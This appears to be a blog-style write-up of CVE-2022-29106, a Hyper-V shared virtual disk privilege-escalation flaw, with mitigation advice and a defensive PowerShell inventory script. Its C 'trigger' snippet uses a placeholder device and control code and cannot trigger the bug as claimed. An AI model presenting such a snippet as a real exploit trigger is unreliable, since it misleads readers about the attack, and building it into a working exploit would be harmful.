In this post, we will explore a recently discovered Windows Hyper-V vulnerability: CVE-2022-29106. An elevation of privilege vulnerability exists in the way that the Windows Hyper-V Shared Virtual Disk (SVD) system handles certain requests. We will discuss the details of this vulnerability, its possible exploits, and the ways to mitigate the risks associated with it.

Microsoft has acknowledged this vulnerability and has released security updates to address the issue. We will also discuss these updates and provide links to the original references for you to understand the problem better and take any necessary actions to protect your systems.

The Vulnerability

CVE-2022-29106 is an elevation of privilege vulnerability in the Windows Hyper-V (type-1) hypervisor when it handles certain requests in a shared virtual disk (SVD) environment.

A successful exploit of this vulnerability could allow the attacker to execute arbitrary code on the host operating system with elevated privileges, potentially leading to complete control of the compromised system.

Reference: Microsoft Security Advisory CVE-2022-29106

Exploit Details

To exploit this vulnerability, an attacker would need to have access to an affected virtual machine (VM), which is sharing a virtual disk with other VMs on the same Hyper-V host.

The attacker could then send specially crafted requests to the shared virtual disk, causing the Hyper-V host to improperly validate the requests. This could, in turn, allow the attacker to execute arbitrary code on the host operating system with elevated privileges.

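Here's an example of a code snippet triggering the vulnerability:

#include <windows.h>
#include <stdio.h>
#include <string.h>

/* Placeholder name: the page gives no control code for this request. */
#define IOCTL_TRIGGER_VULNERABILITY 0

int main(void)
{
  HANDLE hDevice;
  DWORD dwReturn;

  /* "YourSharedVirtualDisk" is a placeholder device name. */
  hDevice = CreateFileA("\\\\.\\YourSharedVirtualDisk", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
  if (hDevice == INVALID_HANDLE_VALUE)
  {
    printf("[-] Could not open the shared virtual disk device. Error: %lu\n", GetLastError());
    return 1;
  }

  /* 1024-byte input buffer filled with 'A' (0x41). */
  BYTE payload[1024];
  memset(payload, 0x41, sizeof(payload));

  /* Send the buffer to the device; no output buffer is requested. */
  DeviceIoControl(hDevice, IOCTL_TRIGGER_VULNERABILITY, payload, sizeof(payload), NULL, 0, &dwReturn, NULL);

  CloseHandle(hDevice);
  return 0;
}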

Mitigation

To mitigate this vulnerability, Microsoft has released security updates for the following affected products. Apply these updates immediately to protect your systems.

- Windows Server 2019
- Windows Server, version 1803
- Windows Server, version 1903
- Windows Server, version 1909
- Windows Server, version 2004
- Windows Server, version 20H2
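
To prioritise patching, it helps to know which hosts actually have VMs attached to a shared virtual disk, since that is the precondition described above. The following is an added example, not code from Microsoft or from the original post; it assumes the Hyper-V PowerShell module and an elevated session on the host, and the KB identifier is a placeholder because the page does not list one.

```powershell
# Added example: list shared virtual disks on this Hyper-V host and check
# whether a given update is installed.
param(
    # Placeholder: the page lists no KB numbers. Take the one for your OS
    # build from the Microsoft advisory for CVE-2022-29106.
    [string]$KbId = 'KB0000000'
)

Import-Module Hyper-V -ErrorAction Stop

# A disk is treated as shared when persistent reservations are enabled on it
# (shared VHDX) or when it is a VHD Set (.vhds) file.
$shared = Get-VM | Get-VMHardDiskDrive | Where-Object {
    $_.SupportPersistentReservations -or $_.Path -like '*.vhds'
}

# Group by disk path so each shared disk shows every local VM attached to it.
$report = $shared | Group-Object Path | ForEach-Object {
    $vmNames = @($_.Group.VMName | Sort-Object -Unique)
    [pscustomobject]@{
        DiskPath = $_.Name
        VMCount  = $vmNames.Count
        VMs      = $vmNames -join ', '
    }
}

if ($report) {
    $report | Format-Table -AutoSize
} else {
    Write-Output 'No shared virtual disks are attached to VMs on this host.'
}

# Get-HotFix matches the exact KB only. A later cumulative update that
# supersedes it will not match, so confirm the OS build number as well.
$hotfix = Get-HotFix -Id $KbId -ErrorAction SilentlyContinue
if ($hotfix) {
    Write-Output "Update $KbId is installed (InstalledOn: $($hotfix.InstalledOn))."
} else {
    Write-Warning "Update $KbId was not found on $env:COMPUTERNAME."
}
```

Get-VM only returns VMs registered on the local host, so in a cluster the script needs to run on every node to see all VMs attached to the same disk.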

Conclusion

CVE-2022-29106 is a severe vulnerability affecting Windows Hyper-V host systems, specifically in the shared virtual disk environment. It is essential to apply the security updates provided by Microsoft to protect your systems from potential exploits.

Stay informed and make sure to keep your systems updated to mitigate such threats.

Timeline

Published on: 05/10/2022 21:15:00 UTC
Last modified on: 05/19/2022 20:35:00 UTC